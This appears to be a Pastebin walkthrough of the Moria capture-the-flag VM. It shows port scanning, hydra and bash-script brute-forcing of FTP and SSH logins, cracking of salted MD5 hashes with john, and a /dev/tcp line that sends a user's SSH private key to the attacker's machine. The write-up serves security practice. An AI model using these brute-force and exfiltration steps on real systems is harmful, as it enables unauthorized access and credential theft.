Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Moria CTF Walkthrough - DigiP
- netdiscover
- 192.168.1.251 08:00:27:9a:4f:a4 6 360 PCS Systemtechnik GmbH
- nmap -sC -sV -T5 -v -p- --open --script vuln 192.168.1.251
- PORT STATE SERVICE VERSION
- 21/tcp open ftp vsftpd 2.0.8 or later
- |_sslv2-drown:
- 22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
- 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
- |_http-csrf: Couldn't find any CSRF vulnerabilities.
- |_http-dombased-xss: Couldn't find any DOM based XSS.
- | http-enum:
- | /w/: Potentially interesting folder w/ directory listing
- |_ /icons/: Potentially interesting folder w/ directory listing
- |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
- |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
- |_http-trace: TRACE is enabled
- MAC Address: 08:00:27:9A:4F:A4 (Oracle VirtualBox virtual NIC)
- view-source:http://192.168.1.251/w/h/i/s/p/e/r/the_abyss/
- Telchar to Thrain:"That human is slow, don't give up yet"
- Refreshing the page, messages change:
- "Eru! Save us!"
- "Is this the end?"
- Fundin:"That human will never save us!"
- "Knock knock"
- Dain:"Is that human deaf? Why is it not listening?"
- Ori:"Will anyone hear us?"
- Balin: "Be quiet, the Balrog will hear you!"
- Nain:"Will the human get the message?"
- Maeglin:"The Balrog is not around, hurry!"
- "We will die here.."
- Oin:"Stop knocking!"
- gobuster -u http://192.168.1.251/w/h/i/s/p/e/r/the_abyss -f -e -x txt,html,php,jpg,gif,png,zip,sql,lock,conf,git,md -w /usr/share/wordlists/dirb/common.txt
- view-source:http://192.168.1.251/w/h/i/s/p/e/r/the_abyss/random.txt
- Balin: "Be quiet, the Balrog will hear you!"
- Oin:"Stop knocking!"
- Ori:"Will anyone hear us?"
- Fundin:"That human will never save us!"
- Nain:"Will the human get the message?"
- "Eru! Save us!"
- "We will die here.."
- "Is this the end?"
- "Knock knock"
- "Too loud!"
- Maeglin:"The Balrog is not around, hurry!"
- Telchar to Thrain:"That human is slow, don't give up yet"
- Dain:"Is that human deaf? Why is it not listening?"
- So index.php is reading in and echoing out the text of this file. Will see later if that comes in handy in any way for abuse.
- manually connecting to the ftp server, the message we are greated with is:
- 220 Welcome Balrog!
- Name (Balrog:root): Balrog
- 331 Please specify the password.
- Password:
- We'll try the name Balrog, and then the others we found in random.txt as we go. Our password wordlist, will consist of the words from the home page image, as well as our random.txt names and keywords in upper, lower, first upper, etc.
- hydra -L /root/HDD2/ctf/moria/random -P /root/HDD2/ctf/moria/random ftp://192.168.1.251
- In doing so, ftp closes, and ftps opens on port 900!
- We try:
- hydra -L /root/HDD2/ctf/moria/random -P /root/HDD2/ctf/moria/random ftps://192.168.1.251 -s 900
- hydra -L /root/HDD2/ctf/moria/random -P /root/HDD2/ctf/moria/random ftp://192.168.1.251 -s 900 -S
- and...that closed, and now ftp open again. Need to try this bit differently. Hydra does not seem to be waiting long enough for the responses and may
- be crushing it.
- Lets try something differet. lftp, is a scriptable ftp client. We can work through this in similar fashion to hydra, but in a more controlled way
- through a bash script.
- syntax: lftp -u $user,$pass sftp://target
- So, lets try
- Added to our hosts file:
- 192.168.1.251 Balrog
- moria.sh
- ---------------------------
- #!/bin/sh
- while IFS='' read -r line || [[ -n "$line" ]]; do
- #lets use one user at a time to not trigger port knock maybe, see where this happens.
- echo $line #echo the password we try each time and monitor console to see what happens on each attempt
- lftp -d -u Balrog,"$line" ftp://balrog:21/ << --EOF--
- pwd
- quit
- --EOF--
- done < "/root/HDD2/ctf/moria/random"
- ---------------------------
- we have to edit /etc/lftp.conf and add the following at the end of the file:
- #set timeout
- set net:timeout 2
- set net:max-retries 2
- set net:reconnect-interval-base 5
- We'll run this like so:
- bash moria.sh > moria.log
- This will try connecting with the name we give in -u first argument, with the password form each line of the random wordlist file
- If Balrog doens't work, then we edit the script and try the next name from random.txt and so on. This seems to not trigger the port close and open on 900
- Now, the reason I redirected output to moria.log, is because much of this is going to scroll by and off screen. Looking through it in terminal scroll-back is a PITA, and we could potentially miss our login deets if not paying attention. moria.log will show the password we passed and their output for pwd, if it is
- successful. The password would be the word on the line directly above the pwd command output.
- If you see this not working and it trips over to port 900 and closes ftp, shorten your wordlist, wait for ftp to open again, rinse, repeat. This will not be a quick process with a long wordlist, so keep it simple(stupid). There are probably better ways of doing this, but hydra does not seem to be working for me at the moment and keeps triggering port 900 open and 21 closed, even when I specify individual logins. Also, SSH with hydra, closes the port almost
- immediatly, so we'll have to be careful how we try our logins.
- Output on the terminal will look similar to:
- 220 Welcome Balrog!
- ---> FEAT
- <--- 211-Features:
- <--- EPRT
- <--- EPSV
- <--- MDTM
- <--- PASV
- <--- REST STREAM
- <--- SIZE
- <--- TVFS
- <--- UTF8
- <--- 211 End
- ---> AUTH TLS
- <--- 530 Please login with USER and PASS.
- ---> OPTS UTF8 ON
- <--- 200 Always in UTF8 mode.
- ---> USER Balrog
- where our log that helps us find the password is:
- Balin
- Oin
- Ori
- mellon
- Mellon
- ftp://Balrog:Mellon@192.168.1.251:21/%2Fprison
- Balrog
- We see our password worked for "Mellon"
- :)
- so deets are "Balrog" and "Mellon"
- However. /prison, does not look promising..
- Trying this for SSH, we realize this isn't going to work here either:
- ssh Balrog@192.168.1.251
- Balrog@192.168.1.251's password:
- Last failed login: Fri Apr 21 07:54:13 EDT 2017 from 192.168.1.66 on ssh:notty
- There were 2 failed login attempts since the last successful login.
- Last login: Sun Mar 12 22:39:59 2017
- WRONG GATE!
- Connection to 192.168.1.251 closed.
- root@kali:/mnt/HDD2/ctf/moria#
- sftp Balrog@192.168.1.251 900
- Balrog@192.168.1.251's password:
- Received message too long 173494863
- so back to moria over ftp.
- ftp Balrog
- user: Balrog
- pass: Mellon
- pwd
- /prison
- we can't list or put any files up, denied.
- keeps asking for pasv mode. We enter:
- quote pasv
- and now we can list files.
- cd /var/www/html
- ls
- ftp> ls
- 200 PORT command successful. Consider using PASV.
- 150 Here comes the directory listing.
- drwxr-xr-x 2 0 0 23 Mar 12 20:38 QlVraKW4fbIkXau9zkAPNGzviT3UKntl
- -r-------- 1 48 48 85 Mar 12 19:55 index.php
- -r-------- 1 48 48 161595 Mar 11 23:12 moria.jpg
- drwxr-xr-x 3 0 0 15 Mar 12 04:50 w
- 226 Directory send OK.
- We navigat to http://192.168.1.251/QlVraKW4fbIkXau9zkAPNGzviT3UKntl/ and gets us:
- Prisoner's name Passkey
- Balin c2d8960157fc8540f6d5d66594e165e0
- Oin 727a279d913fba677c490102b135e51e
- Ori 8c3c3152a5c64ffb683d78efc3520114
- Maeglin 6ba94d6322f53f30aca4f34960203703
- Fundin c789ec9fae1cd07adfc02930a39486a1
- Nain fec21f5c7dcf8e5e54537cfda92df5fe
- Dain 6a113db1fd25c5501ec3a5936d817c29
- Thrain 7db5040c351237e8332bfbba757a1019
- Telchar dd272382909a4f51163c77da6356cc6f
- Also viewing source we find:
- <!--
- 6MAp84
- bQkChe
- HnqeN4
- e5ad5s
- g9Wxv7
- HCCsxP
- cC5nTr
- h8spZR
- tb9AWe
- MD5(MD5(Password).Salt)
- -->
- We can try and build a hash file for john like so:
- Balin:c2d8960157fc8540f6d5d66594e165e0$6MAp84
- Oin:727a279d913fba677c490102b135e51e$bQkChe
- Ori:8c3c3152a5c64ffb683d78efc3520114$HnqeN4
- Maeglin:6ba94d6322f53f30aca4f34960203703$e5ad5s
- Fundin:c789ec9fae1cd07adfc02930a39486a1$g9Wxv7
- Nain:fec21f5c7dcf8e5e54537cfda92df5fe$HCCsxP
- Dain:6a113db1fd25c5501ec3a5936d817c29$cC5nTr
- Thrain:7db5040c351237e8332bfbba757a1019$h8spZR
- Telchar:dd272382909a4f51163c77da6356cc6f$tb9AWe
- john --list=subformats
- We want: MD5(MD5(Password).Salt)
- UserFormat = dynamic_2006 type = dynamic_2006: md5(md5($p).$s) (PW > 55 bytes)
- john hashes --format=dynamic_2006 --fork=25 -w=/usr/share/wordlists/rockyou.txt
- darkness (Thrain)
- magic (Telchar)
- abcdef (Dain)
- hunter2 (Fundin)
- spanky (Ori)
- warrior (Nain)
- rainbow (Oin)
- flower (Balin)
- fuckoff (Maeglin)
- Nice and quick!!
- We already know Balrog is Mellon and not going to work on SSH.
- We've now got some more items we can add to a password/wordlist
- ftp logins with the above don't seem to work. we can try triggering port 900 again, and seeing if any of these will work.
- We try:
- hydra -l Balin -P random ftps://balrog -s900
- hydra -l Balin -P random ftp://balrog -s900 -S
- Neither work
- :(
- hydra -L names -P random ftps://balrog -s900
- hydra -L names -P random ftp://balrog -s900 -S
- we can adjust our lftp script again.
- ---------------------------
- #!/bin/sh
- while IFS='' read -r line || [[ -n "$line" ]]; do
- #lets use one user at a time to not trigger port knock maybe, see where this happens.
- echo $line #echo the password we try each time and monitor console to see what happens on each attempt
- lftp -d -u Balin,"$line" ftps://192.168.1.251:900/ << --EOF--
- pwd
- quit
- --EOF--
- #end of file delimeter
- done < "/root/HDD2/ctf/moria/random"
- ---------------------------
- so none of these seem to work for ftp or ftps
- Lets try ssh:
- hydra -L names -P random ssh://balrog
- thesearen't going well with hydra. Ports keep closing, including SSH. lftp doesn't suport ssh either. So, we try each user, one at a time.
- --------------------------
- #!/bin/sh
- ## balrog ssh attempts
- sshpass -f <(printf '%s\n' darkness) ssh Thrain@balrog
- sshpass -f <(printf '%s\n' magic) ssh Telchar@balrog
- sshpass -f <(printf '%s\n' abcdef) ssh Dain@balrog
- sshpass -f <(printf '%s\n' hunter2) ssh Fundin@balrog
- sshpass -f <(printf '%s\n' spanky) ssh Ori@balrog
- sshpass -f <(printf '%s\n' warrior) ssh Nain@balrog
- sshpass -f <(printf '%s\n' rainbow) ssh Oin@balrog
- sshpass -f <(printf '%s\n' flower) ssh Balin@balrog
- sshpass -f <(printf '%s\n' fuckoff) ssh Maeglin@balrog
- --------------------------
- And with that, we get:
- bash moria.sh
- Permission denied, please try again.
- Permission denied, please try again.
- Permission denied, please try again.
- Permission denied, please try again.
- Last login: Sun Mar 12 22:57:09 2017
- -bash-4.2$ id
- uid=1002(Ori) gid=1003(notBalrog) groups=1003(notBalrog)
- -bash-4.2$
- boom! login with ori!
- Ori pts/0 2017-04-21 09:28 (192.168.1.66)
- -bash-4.2$ uname -a;cat /etc/*ele*; cat /etc/issue
- Linux Moria 3.10.0-514.el7.x86_64 #1 SMP Tue Nov 22 16:42:41 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
- CentOS Linux release 7.3.1611 (Core)
- Derived from Red Hat Enterprise Linux 7.3 (Source)
- NAME="CentOS Linux"
- VERSION="7 (Core)"
- ID="centos"
- ID_LIKE="rhel fedora"
- VERSION_ID="7"
- PRETTY_NAME="CentOS Linux 7 (Core)"
- ANSI_COLOR="0;31"
- CPE_NAME="cpe:/o:centos:centos:7"
- HOME_URL="https://www.centos.org/"
- BUG_REPORT_URL="https://bugs.centos.org/"
- CENTOS_MANTISBT_PROJECT="CentOS-7"
- CENTOS_MANTISBT_PROJECT_VERSION="7"
- REDHAT_SUPPORT_PRODUCT="centos"
- REDHAT_SUPPORT_PRODUCT_VERSION="7"
- CentOS Linux release 7.3.1611 (Core)
- CentOS Linux release 7.3.1611 (Core)
- cpe:/o:centos:centos:7
- ▄▀▀▄ ▄▀▄ ▄▀▀▀▀▄ ▄▀▀▄▀▀▀▄ ▄▀▀█▀▄ ▄▀▀█▄
- █ █ ▀ █ █ █ █ █ █ █ █ █ ▐ ▄▀ ▀▄
- ▐ █ █ █ █ ▐ █▀▀█▀ ▐ █ ▐ █▄▄▄█
- █ █ ▀▄ ▄▀ ▄▀ █ █ ▄▀ █
- ▄▀ ▄▀ ▀▀▀▀ █ █ ▄▀▀▀▀▀▄ █ ▄▀
- █ █ ▐ ▐ █ █ ▐ ▐
- ▐ ▐ ▐ ▐
- -bash-4.2$
- -bash-4.2$ cat /etc/passwd
- root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin
- systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
- dbus:x:81:81:System message bus:/:/sbin/nologin
- polkitd:x:998:997:User for polkitd:/:/sbin/nologin
- tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- chrony:x:997:995::/var/lib/chrony:/sbin/nologin
- geoclue:x:996:994:User for geoclue:/var/lib/geoclue:/sbin/nologin
- usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
- rtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin
- colord:x:995:993:User for colord:/var/lib/colord:/sbin/nologin
- pulse:x:171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
- gdm:x:42:42::/var/lib/gdm:/sbin/nologin
- apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
- abatchy:x:1000:1003::/home/abatchy:/bin/bash
- Balrog:x:1001:1001::/prison:/sbin/nologin
- Ori:x:1002:1003::/home/Ori:/bin/bash
- cd /home
- ls
- batchy Ori
- -bash-4.2$ cd abatchy/
- -bash: cd: abatchy/: Permission denied
- -bash-4.2$ cd Ori/
- -bash-4.2$ ls -la
- total 8
- drwx------ 3 Ori notBalrog 55 Mar 12 22:57 .
- drwxr-x---. 4 root notBalrog 32 Mar 14 00:36 ..
- -rw------- 1 Ori notBalrog 1 Mar 14 00:12 .bash_history
- -rw-r--r-- 1 root root 225 Mar 13 23:53 poem.txt
- drwx------ 2 Ori notBalrog 57 Mar 12 22:57 .ssh
- -bash-4.2$ cat .bash_history
- -bash-4.2$ cat poem.txt
- Ho! Ho! Ho! to the bottle I go
- To heal my heart and drown my woe.
- Rain may fall and wind may blow,
- And many miles be still to go,
- But under a tall tree I will lie,
- And let the clouds go sailing by.
- PS: Moria will not fall!
- -bash-4.2$
- we tarball .ssh files and send them back to us for the keys.
- id_rsa file seems corrupt, lets send by itself
- cat id_rsa >& /dev/tcp/192.168.1.66/443 0>&1
- Later we find these don't work because known_hosts, indicates that the user is logging into SSH is over 127.0.0.1 from the logged in account. This requirs us to ssh while logged in as Ori To root? Oh yeah!
- -bash-4.2$ cat known_hosts
- 127.0.0.1 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCuLX/CWxsOhekXJRxQqQH/Yx0SD+XgUpmlmWN1Y8cvmCYJslOh4vE+I6fmMwCdBfi4W061RmFc+vMALlQUYNz0=
- -bash-4.2$ #hmm. 127.0.0.1 you don't say...
- -bash-4.2$ ssh root@127.0.0.1
- Last login: Fri Apr 21 10:32:40 2017 from 127.0.0.1
- [root@Moria ~]# #winner winner chicken dinner, no password asked..
- [root@Moria ~]# ls -lash
- total 52K
- 0 dr-xr-x---. 8 root root 276 Mar 12 23:02 .
- 0 dr-xr-xr-x. 18 root root 258 Mar 14 00:36 ..
- 4.0K -rw-r--r-- 1 root root 21 Mar 12 21:44 0
- 4.0K -rw-------. 1 root root 1.3K Mar 9 22:41 anaconda-ks.cfg
- 4.0K -rw-------. 1 root root 325 Apr 21 10:33 .bash_history
- 4.0K -rw-r--r-- 1 root root 18 Dec 28 2013 .bash_logout
- 4.0K -rw-r--r-- 1 root root 176 Dec 28 2013 .bash_profile
- 4.0K -rw-r--r-- 1 root root 176 Dec 28 2013 .bashrc
- 0 drwx------. 7 root root 86 Mar 9 23:47 .cache
- 0 drwxr-xr-x. 10 root root 128 Mar 9 23:10 .config
- 4.0K -rw-r--r-- 1 root root 100 Dec 28 2013 .cshrc
- 0 drwxr-xr-x. 2 root root 6 Mar 9 23:10 Desktop
- 4.0K -rw-r--r-- 1 root root 439 Mar 13 23:57 flag.txt
- 4.0K -rw-r--r-- 1 root root 20 Mar 11 21:00 hosts
- 12K -rw-------. 1 root root 8.5K Mar 12 22:30 .ICEauthority
- 0 drwx------. 3 root root 19 Mar 9 23:10 .local
- 0 drwxr-----. 3 root root 19 Mar 11 11:35 .pki
- 0 drwx------ 2 root root 48 Mar 12 23:00 .ssh
- 4.0K -rw-r--r-- 1 root root 129 Dec 28 2013 .tcshrc
- [root@Moria ~]# cat flag.txt
- “All that is gold does not glitter,
- Not all those who wander are lost;
- The old that is strong does not wither,
- Deep roots are not reached by the frost.
- From the ashes a fire shall be woken,
- A light from the shadows shall spring;
- Renewed shall be blade that was broken,
- The crownless again shall be king.”
- All That is Gold Does Not Glitter by J. R. R. Tolkien
- I hope you suff.. enjoyed this VM. It wasn't so hard, was it?
- -Abatchy
- [root@Moria ~]#
- :)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement